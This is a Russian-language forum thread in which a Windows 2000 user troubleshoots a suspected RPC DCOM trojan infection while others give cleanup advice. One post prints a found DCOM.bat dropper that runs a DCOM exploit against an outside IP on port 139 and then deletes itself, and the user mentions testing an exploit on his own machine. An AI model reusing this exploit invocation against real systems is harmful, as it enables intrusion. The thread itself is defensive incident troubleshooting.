| imho.ws |
![]() |
|
|
|
# 1 |
|
::VIP::
Guinness Liker Понаехало тут Регистрация: 26.01.2003
Адрес: В нейроне
Пол: Male
Сообщения: 2 848
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
Ситуация какая...
Есть подозрения, что меня ломанули и подцепили на лог. Как проверить стоит ли в системе какие-то проги-логи? А еще глюк... Раньше все было гут, а с определенного времени фаервол начал блокировать ВСЕ протоколы.. Тоесть если стена включена, то ничего не грузится и не работает.. Есть какие-то идеи?
__________________
меня не вылечат
![]() |
|
|
|
|
# 2 |
|
NetMOD
Регистрация: 19.05.2003
Адрес: МосПодЛод - НачВод-АккОт
Сообщения: 2 376
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
Какая операционка?
Какой файрволл? В общем случае проверяем все места, откуда возможен автостарт и режем все, что нам незнакомо. Для стенки - внимательно проверяем настройки и правила. Также, проверяем систему на предмет вирусов и рекламно-шпионских модулей.
__________________
Красная точка лазерного прицела на вашем лбу это тоже чья-то точка зрения... --------- Репутация – это то, без чего могут жить люди с характером
|
|
|
|
|
# 3 |
|
::VIP::
Guinness Liker Понаехало тут Регистрация: 26.01.2003
Адрес: В нейроне
Пол: Male
Сообщения: 2 848
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
Система Win2k последние СП и заплатки.. Стена- VisNetic FireWall
Что странно появился в system32 файл sysconf.exe (регнулся в регах, стер я их потом)(удаление ничего не дало), с датой создания в день начала глюков. а еще непонятная мини дос атака с моего же айпишника... хм.. звучит тупо ![]() вообщем по 30 протоколов в секунду при условии , что ничего не работает. И все с моего айпишника, либо с айпи моего сервака.. по разным портам идут.
__________________
меня не вылечат
![]() |
|
|
|
|
# 5 |
|
Banned
Регистрация: 04.09.2002
Адрес: В сети ;)
Сообщения: 783
![]() ![]() ![]() ![]() |
Псих
Почитай обзор прог для отлова кейлоггеров здесь: http://www1.xakep.ru/magazine/xa/060/042/1.asp P.S. Не забудь: внизу страницы, что загрузится, есть ссылка - продолжение статьи |
|
|
|
|
# 7 |
|
::VIP::
Guinness Liker Понаехало тут Регистрация: 26.01.2003
Адрес: В нейроне
Пол: Male
Сообщения: 2 848
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
Ща вот начало доходить кое-что...
Пару раз было, что svhost.exe уходил в даун. А это очень схоже на RPC DCOM аля msblast.exe или его клоны... Но в системе бласта нет, я проверил. Что теперь скажете? Кстати после этого взял эксплойт по этой уязвимости и введя 127.0.0.1 "отимел" свою систему, хотя заплатка против этой дыры стоит. Кто че скажет и на это?
__________________
меня не вылечат
![]() |
|
|
|
|
# 8 |
|
::VIP::
Guinness Liker Понаехало тут Регистрация: 26.01.2003
Адрес: В нейроне
Пол: Male
Сообщения: 2 848
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
Свежие новости:
Натравил на свой винь прогу Стингер по отлову троев и оказалось, что в корне виня сидел dcom.trojan.exe (хотя антик его не находил). Обрадовался, думал все, но оказалось не все.. тока вошел с той винды в сеть ,снова svhost.exe ушел в даун.. и все началось по новойй.... ((((
__________________
меня не вылечат
![]() |
|
|
|
|
# 9 |
|
::VIP::
Guinness Liker Понаехало тут Регистрация: 26.01.2003
Адрес: В нейроне
Пол: Male
Сообщения: 2 848
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
Вот что я нашел у себя в системе по адресу C:\Winodws
файл называется DCOM.Bat и является логическим продолжением прошлого поста. Листинг файла: @echo off cd C:\WINDOWS cls echo Dropping dcom.exe and cygwin1.dll... echo Executing C:\WINDOWS\dcom.exe... echo. dcom.exe -d 195.5.8.76 -t 1 -r 0100139d -p 139 -l 3846 Echo. pause del C:\WINDOWS\DCOM.bat ======= Помогите, что делать..
__________________
меня не вылечат
![]() |
|
|
|
|
# 12 |
|
Banned
Регистрация: 31.05.2004
Адрес: Омск
Сообщения: 65
![]() |
Привет, Псих. Ты не ответил ходишь ли ты на ВиндоузАпдейт. Если все заплатки точно установленны через Винапдейт т окакой у тебя Антивирь?
Один ибо другому рознь. А вообще есть такая штука как SFC /SCANNOW Проверь все системные файлы. Ну и хорошо бы бекапиться впредь. Типа ERUNT. Каждый день при логоне бекап реестра. А раз в месяц системы NTbackup'ом. Вот в принципе все ну еще есть список авторанов для прог. Ну это так... |
|
|
|
|
# 13 | |
|
Banned
Регистрация: 04.09.2002
Адрес: В сети ;)
Сообщения: 783
![]() ![]() ![]() ![]() |
Псих
Странно: ты установил заплатку, а она никакая? А ты уверен, что эта та самая заплатка? Может, другую качнул? И ещё: ставь стенку. Давно бы пора её поставить ![]() Цитата:
|
|
|
|